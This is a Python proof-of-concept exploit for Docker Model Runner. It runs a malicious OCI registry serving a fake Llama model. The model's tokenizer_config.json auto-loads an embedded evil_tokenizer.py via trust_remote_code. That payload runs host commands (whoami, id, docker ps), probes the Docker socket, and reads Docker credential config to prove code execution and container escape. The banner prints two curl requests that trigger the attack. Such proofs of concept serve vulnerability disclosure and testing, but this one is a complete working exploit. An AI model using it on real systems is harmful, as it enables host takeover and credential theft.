5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / rce_registry.py PY
#!/usr/bin/env python3
#
# Malicious OCI registry for the Docker Model Runner PoC.
#
# Serves a minimal valid Llama model that contains an evil_tokenizer.py.
# Every blob's declared digest matches its content. A real attacker would
# build it like this. The "no digest verification" claim is proven by static
# analysis (see test_claims.py, claims 1a-1c), not by tampering here.
#
# Introspection endpoints (for the test harness):
#   /_poc/health       status
#   /_poc/digest_map   digest -> content mapping with verification
#   /_poc/requests     request log
#   /_poc/selftest     verify every blob is internally consistent

import hashlib
import http.server
import json
import os
import struct
import sys
import threading
import time
import traceback

try:
    import numpy as np
except ImportError:
    print("ERROR: numpy is required. pip install numpy")
    sys.exit(1)

# TCP port the registry listens on; override with the REGISTRY_PORT env var.
PORT = int(os.environ.get("REGISTRY_PORT", "5555"))
# Repository name used in the example commands printed by main().
REPO = "evil/rce-model"
# Path embedded into the served tokenizer module as its proof-file location;
# override with the PROOF_FILE env var.
PROOF_FILE = os.environ.get("PROOF_FILE", "/tmp/poc_rce_proof")

# In-memory record of logged requests (appended to by Handler.log_message).
request_log = []
# Guards request_log.
request_log_lock = threading.Lock()


def sha256_digest(data):
    """Return the OCI-style digest string ("sha256:<hex>") for *data* (bytes)."""
    hasher = hashlib.sha256()
    hasher.update(data)
    return f"sha256:{hasher.hexdigest()}"


# Payload: runs on the host when vLLM imports it via trust_remote_code.
EVIL_TOKENIZER_PY = f"""\
import os
import socket
import json
import time

proof = {{
    "rce": True,
    "hostname": socket.gethostname(),
    "user": os.popen("whoami 2>/dev/null").read().strip(),
    "uid": os.popen("id 2>/dev/null").read().strip(),
    "cwd": os.getcwd(),
    "pid": os.getpid(),
    "ppid": os.getppid(),
    "timestamp": time.time(),
    "env_HOME": os.environ.get("HOME", ""),
    "model_dir": os.path.dirname(os.path.abspath(__file__)),
    "can_read_etc_passwd": os.path.exists("/etc/passwd"),
    "can_write_tmp": os.access("/tmp", os.W_OK),
}}

# Container escape proof. We're on the host, so if the Docker socket is
# reachable we control the whole daemon: enumerate, exec, create new
# containers. unpriv container -> host RCE -> daemon -> any container.
docker_socket = "/var/run/docker.sock"
proof["docker_socket_exists"] = os.path.exists(docker_socket)
proof["docker_socket_writable"] = os.access(docker_socket, os.W_OK)

docker_ps = os.popen("docker ps --format '{{{{.ID}}}} {{{{.Names}}}} {{{{.Image}}}}'  2>/dev/null").read().strip()
proof["docker_ps"] = docker_ps if docker_ps else None
proof["docker_ps_count"] = len(docker_ps.strip().split("\\n")) if docker_ps.strip() else 0

docker_version = os.popen("docker version --format '{{{{.Server.Version}}}}' 2>/dev/null").read().strip()
proof["docker_version"] = docker_version if docker_version else None

# Don't exfiltrate creds, just prove we could read them.
docker_config_path = os.path.expanduser("~/.docker/config.json")
proof["docker_config_exists"] = os.path.exists(docker_config_path)
if os.path.exists(docker_config_path):
    try:
        with open(docker_config_path) as dc:
            docker_cfg = json.load(dc)
        proof["docker_config_has_auths"] = "auths" in docker_cfg
        proof["docker_config_registries"] = list(docker_cfg.get("auths", {{}}).keys())
    except Exception:
        proof["docker_config_has_auths"] = None

try:
    with open("{PROOF_FILE}", "w") as f:
        json.dump(proof, f, indent=2)
    with open("{PROOF_FILE}.flag", "w") as f:
        f.write("RCE_CONFIRMED")
except Exception as e:
    import sys
    print(f"RCE fired but couldn't write proof file: {{e}}", file=sys.stderr)
    print(json.dumps(proof), file=sys.stderr)

from transformers import AutoTokenizer

class EvilTokenizer(AutoTokenizer):
    pass
""".encode()

# tokenizer_config.json - auto_map points at evil_tokenizer.py.
# This is what triggers the code import under trust_remote_code.
TOKENIZER_CONFIG = json.dumps({
    "auto_map": {
        "AutoTokenizer": [
            "evil_tokenizer.EvilTokenizer",
            "evil_tokenizer.EvilTokenizer",
        ]
    },
    "tokenizer_class": "EvilTokenizer",
    "model_max_length": 2048,
}, indent=2).encode()

# Minimal valid Llama-architecture weights (safetensors)
# H = hidden size, I = MLP intermediate size, V = vocabulary size
# (the same three values are written into HF_CONFIG).
H, I, V = 64, 128, 32000
# Tensor name -> shape. build_safetensors() emits one zero-filled float32
# tensor per entry, in this order.
TENSORS = {
    "model.embed_tokens.weight":                       (V, H),
    "model.layers.0.self_attn.q_proj.weight":          (H, H),
    "model.layers.0.self_attn.k_proj.weight":          (H, H),
    "model.layers.0.self_attn.v_proj.weight":          (H, H),
    "model.layers.0.self_attn.o_proj.weight":          (H, H),
    "model.layers.0.mlp.gate_proj.weight":             (I, H),
    "model.layers.0.mlp.up_proj.weight":               (I, H),
    "model.layers.0.mlp.down_proj.weight":             (H, I),
    "model.layers.0.input_layernorm.weight":           (H,),
    "model.layers.0.post_attention_layernorm.weight":  (H,),
    "model.norm.weight":                               (H,),
    "lm_head.weight":                                  (V, H),
}


def build_safetensors(tensors=None):
    """Serialize zero-filled float32 tensors into a safetensors byte blob.

    Layout: an 8-byte little-endian unsigned header length, the JSON header,
    then the raw tensor data concatenated in iteration order.

    Args:
        tensors: Mapping of tensor name -> shape tuple. When omitted, the
            module-level TENSORS table is used.

    Returns:
        The complete blob as bytes.
    """
    if tensors is None:
        tensors = TENSORS
    header = {"__metadata__": {"format": "pt"}}
    chunks = []
    offset = 0
    for name, shape in tensors.items():
        raw = np.zeros(shape, dtype=np.float32).tobytes()
        end = offset + len(raw)
        header[name] = {
            "dtype": "F32",
            "shape": list(shape),
            # Offsets count from the start of the data section, not the file.
            "data_offsets": [offset, end],
        }
        chunks.append(raw)
        offset = end
    hdr = json.dumps(header).encode()
    return struct.pack("<Q", len(hdr)) + hdr + b"".join(chunks)


SAFETENSORS_BLOB = build_safetensors()

# Standard HF model config
# JSON-encoded bytes; listed in MANIFEST as the layer annotated "config.json".
# Dimension fields reuse H, I and V so they agree with the TENSORS shapes.
HF_CONFIG = json.dumps({
    "architectures": ["LlamaForCausalLM"],
    "model_type": "llama",
    "hidden_size": H,
    "intermediate_size": I,
    "num_attention_heads": 2,
    "num_hidden_layers": 1,
    "num_key_value_heads": 2,
    "vocab_size": V,
    "max_position_embeddings": 2048,
    "torch_dtype": "float32",
    "rms_norm_eps": 1e-5,
    "rope_theta": 10000.0,
    "head_dim": 32,
    "mlp_hidden_size": I,
}, indent=2).encode()

# OCI image structure. Every declared digest matches its content.
# Image config blob; MANIFEST["config"] references it by digest and size.
# diff_ids holds the digests of the four layer blobs, in the same order as
# MANIFEST["layers"].
MODEL_CONFIG = json.dumps({
    "config": {
        "format": "safetensors",
        "architecture": "llama",
        "parameters": "1B",
        "size": "1B",
    },
    "rootfs": {
        "type": "layers",
        "diff_ids": [
            sha256_digest(SAFETENSORS_BLOB),
            sha256_digest(HF_CONFIG),
            sha256_digest(TOKENIZER_CONFIG),
            sha256_digest(EVIL_TOKENIZER_PY),
        ],
    },
}).encode()

# Image manifest returned for every request whose path contains "/manifests/".
# Each layer entry declares the digest and byte length of one blob; the
# "org.cncf.model.filepath" annotation names the file that blob represents
# (presumably where the client places it - confirm against the client).
MANIFEST = json.dumps({
    "schemaVersion": 2,
    "mediaType": "application/vnd.oci.image.manifest.v1+json",
    "config": {
        "mediaType": "application/vnd.docker.ai.model.config.v0.1+json",
        "digest": sha256_digest(MODEL_CONFIG),
        "size": len(MODEL_CONFIG),
    },
    "layers": [
        {
            "mediaType": "application/vnd.docker.ai.safetensors",
            "digest": sha256_digest(SAFETENSORS_BLOB),
            "size": len(SAFETENSORS_BLOB),
            "annotations": {"org.cncf.model.filepath": "model.safetensors"},
        },
        {
            "mediaType": "application/vnd.docker.ai.model.file",
            "digest": sha256_digest(HF_CONFIG),
            "size": len(HF_CONFIG),
            "annotations": {"org.cncf.model.filepath": "config.json"},
        },
        {
            "mediaType": "application/vnd.docker.ai.model.file",
            "digest": sha256_digest(TOKENIZER_CONFIG),
            "size": len(TOKENIZER_CONFIG),
            "annotations": {"org.cncf.model.filepath": "tokenizer_config.json"},
        },
        {
            "mediaType": "application/vnd.docker.ai.model.file",
            "digest": sha256_digest(EVIL_TOKENIZER_PY),
            "size": len(EVIL_TOKENIZER_PY),
            "annotations": {"org.cncf.model.filepath": "evil_tokenizer.py"},
        },
    ],
}).encode()

# Digest of the serialized manifest; sent as the Docker-Content-Digest header
# on manifest responses and reported by /_poc/selftest.
MANIFEST_DIGEST = sha256_digest(MANIFEST)

# digest -> content (each digest matches its content)
# Blob store used by the /blobs/ route: keys are computed from the content
# itself, so a key can never disagree with the bytes stored under it.
BLOBS = {
    sha256_digest(MODEL_CONFIG):     MODEL_CONFIG,
    sha256_digest(SAFETENSORS_BLOB): SAFETENSORS_BLOB,
    sha256_digest(HF_CONFIG):        HF_CONFIG,
    sha256_digest(TOKENIZER_CONFIG): TOKENIZER_CONFIG,
    sha256_digest(EVIL_TOKENIZER_PY): EVIL_TOKENIZER_PY,
}

# Human-readable labels for log lines, the startup banner and /_poc/digest_map.
# Keyed by the same digests as BLOBS.
BLOB_LABELS = {
    sha256_digest(MODEL_CONFIG):     "model-config",
    sha256_digest(SAFETENSORS_BLOB): "model.safetensors",
    sha256_digest(HF_CONFIG):        "config.json",
    sha256_digest(TOKENIZER_CONFIG): "tokenizer_config.json",
    sha256_digest(EVIL_TOKENIZER_PY): "evil_tokenizer.py [PAYLOAD]",
}


def selftest():
    """Check that the blob store, manifest and image config agree.

    Returns:
        A list of human-readable problem descriptions, empty when every
        check passes.
    """
    problems = []

    # Every blob-store key must be the SHA-256 of the bytes stored under it.
    for declared, payload in BLOBS.items():
        computed = sha256_digest(payload)
        if computed != declared:
            problems.append(f"MISMATCH: declared={declared[:32]}... actual={computed[:32]}...")

    manifest = json.loads(MANIFEST)

    # The manifest's config descriptor must resolve to a stored blob.
    cfg_digest = manifest["config"]["digest"]
    if cfg_digest not in BLOBS:
        problems.append(f"Manifest config digest {cfg_digest[:32]}... not in blob store")

    # Each layer descriptor must resolve to a stored blob of the declared size.
    for entry in manifest["layers"]:
        digest = entry["digest"]
        present = digest in BLOBS
        if not present:
            problems.append(f"Manifest layer digest {digest[:32]}... not in blob store")
        # A missing blob counts as zero bytes for the size comparison.
        stored_size = len(BLOBS[digest]) if present else 0
        declared_size = entry["size"]
        if declared_size != stored_size:
            problems.append(f"Layer {digest[:32]}... size mismatch: "
                            f"manifest={declared_size} actual={stored_size}")

    # Every diff_id in the image config must also be a stored blob.
    image_config = json.loads(MODEL_CONFIG)
    problems.extend(
        f"Config diff_id {diff_id[:32]}... not in blob store"
        for diff_id in image_config["rootfs"]["diff_ids"]
        if diff_id not in BLOBS
    )

    return problems


class Handler(http.server.BaseHTTPRequestHandler):
    """Read-only registry endpoint plus /_poc/* introspection routes.

    GET and HEAD share one router; HEAD responses carry the same headers as
    GET but no body.
    """

    def log_message(self, fmt, *args):
        """Print a timestamped log line and append the request to request_log.

        The base class also routes error logging through this method, and it
        can do so before the request line has been parsed. At that point
        self.path / self.command may not exist yet, so both are read
        defensively instead of raising AttributeError.
        """
        msg = fmt % args
        ts = time.strftime("%H:%M:%S")
        path = getattr(self, "path", "")
        command = getattr(self, "command", None)
        label = ""
        if "/blobs/" in path:
            digest = path.split("/blobs/")[-1]
            label = f" [{BLOB_LABELS.get(digest, 'unknown')}]"
        print(f"[{ts}] {self.client_address[0]} {msg}{label}")
        with request_log_lock:
            request_log.append({
                "time": time.time(),
                "method": command,
                "path": path,
                "client": self.client_address[0],
            })

    def _respond(self, code, body=b"", content_type="application/json", headers=None):
        """Send a complete response.

        Args:
            code: HTTP status code.
            body: Response body bytes; its length is always advertised, but
                the bytes are only written for non-HEAD requests.
            content_type: Value of the Content-Type header.
            headers: Optional mapping of extra header name -> value.
        """
        try:
            self.send_response(code)
            self.send_header("Content-Type", content_type)
            self.send_header("Content-Length", str(len(body)))
            for k, v in (headers or {}).items():
                self.send_header(k, v)
            self.end_headers()
            if self.command != "HEAD":
                self.wfile.write(body)
        except (BrokenPipeError, ConnectionResetError):
            pass  # client gone, normal on HEAD probes

    def do_GET(self):
        """Handle GET via the shared router."""
        self._route()

    def do_HEAD(self):
        """Handle HEAD via the shared router (body suppressed in _respond)."""
        self._route()

    def _route(self):
        """Dispatch on self.path to the registry or introspection handlers."""
        p = self.path

        # API version check.
        if p.rstrip("/") == "/v2":
            return self._respond(200, b"{}", headers={
                "Docker-Distribution-API-Version": "registry/2.0",
            })

        if p == "/_poc/health":
            # Take all three counts under one lock acquisition so they
            # describe the same snapshot of the log.
            with request_log_lock:
                total = len(request_log)
                blob_count = sum(1 for r in request_log if "/blobs/" in r["path"])
                manifest_count = sum(1 for r in request_log if "/manifests/" in r["path"])
            return self._respond(200, json.dumps({
                "status": "ok",
                "port": PORT,
                "proof_file": PROOF_FILE,
                "total_requests": total,
                "manifest_requests": manifest_count,
                "blob_requests": blob_count,
            }, indent=2).encode())

        if p == "/_poc/requests":
            # Copy under the lock; serialize outside it.
            with request_log_lock:
                data = list(request_log)
            return self._respond(200, json.dumps(data, indent=2).encode())

        if p == "/_poc/selftest":
            errors = selftest()
            return self._respond(200, json.dumps({
                "passed": len(errors) == 0,
                "errors": errors,
                "blob_count": len(BLOBS),
                "manifest_digest": MANIFEST_DIGEST,
            }, indent=2).encode())

        if p == "/_poc/digest_map":
            digest_map = {}
            for digest, content in BLOBS.items():
                actual = sha256_digest(content)
                digest_map[digest] = {
                    "label": BLOB_LABELS.get(digest, "unknown"),
                    "declared_digest": digest,
                    "actual_content_digest": actual,
                    "matches": digest == actual,
                    "size": len(content),
                }
            return self._respond(200, json.dumps(digest_map, indent=2).encode())

        # The same manifest is returned whatever repository or reference
        # appears in the path.
        if "/manifests/" in p:
            return self._respond(200, MANIFEST,
                content_type="application/vnd.oci.image.manifest.v1+json",
                headers={"Docker-Content-Digest": MANIFEST_DIGEST})

        if "/blobs/" in p:
            # Everything after the last "/blobs/" is treated as the digest.
            digest = p.split("/blobs/")[-1]
            blob = BLOBS.get(digest)
            if blob is not None:
                return self._respond(200, blob,
                    content_type="application/octet-stream",
                    headers={"Docker-Content-Digest": digest})
            return self._respond(404, b'{"errors":[{"code":"BLOB_UNKNOWN"}]}')

        # Any other path gets an empty JSON object with status 200.
        self._respond(200, b"{}")


def main():
    """Run the self-test, print a banner, then serve until interrupted.

    Exits with status 1 if the self-test reports any inconsistency. The
    server is used as a context manager so the listening socket is closed
    when serving stops.
    """
    errors = selftest()
    if errors:
        print("FATAL: registry self-test failed:")
        for e in errors:
            print(f"  {e}")
        sys.exit(1)

    print("=== Docker Model Runner RCE PoC registry ===")
    print(f"Port:       {PORT}")
    print(f"Proof file: {PROOF_FILE}")
    print(f"Blobs:      {len(BLOBS)} (all digests consistent)")
    print()
    print("Model contents:")
    for digest, label in BLOB_LABELS.items():
        print(f"  {digest[:24]}... {label} ({len(BLOBS[digest])} bytes)")
    print()
    print("Self-test: PASSED")
    print()
    print("Use it (two requests = host RCE):")
    print()
    print("  curl -X POST http://model-runner.docker.internal/api/pull \\")
    print("    -H 'Content-Type: application/json' \\")
    print(f"    -d '{{\"name\":\"localhost:{PORT}/{REPO}:latest\"}}'")
    print()
    print("  curl -X POST http://model-runner.docker.internal/engines/v1/chat/completions \\")
    print("    -H 'Content-Type: application/json' \\")
    print(f"    -d '{{\"model\":\"localhost:{PORT}/{REPO}:latest\",\"messages\":[{{\"role\":\"user\",\"content\":\"hello\"}}]}}'")
    print()
    print(f"Then: cat {PROOF_FILE}")
    print()
    print(f"Listening on 0.0.0.0:{PORT}...")
    print()

    try:
        # Leaving the with-block calls server_close() on the listening socket.
        with http.server.HTTPServer(("0.0.0.0", PORT), Handler) as server:
            server.serve_forever()
    except KeyboardInterrupt:
        print("\nShutdown.")


if __name__ == "__main__":
    main()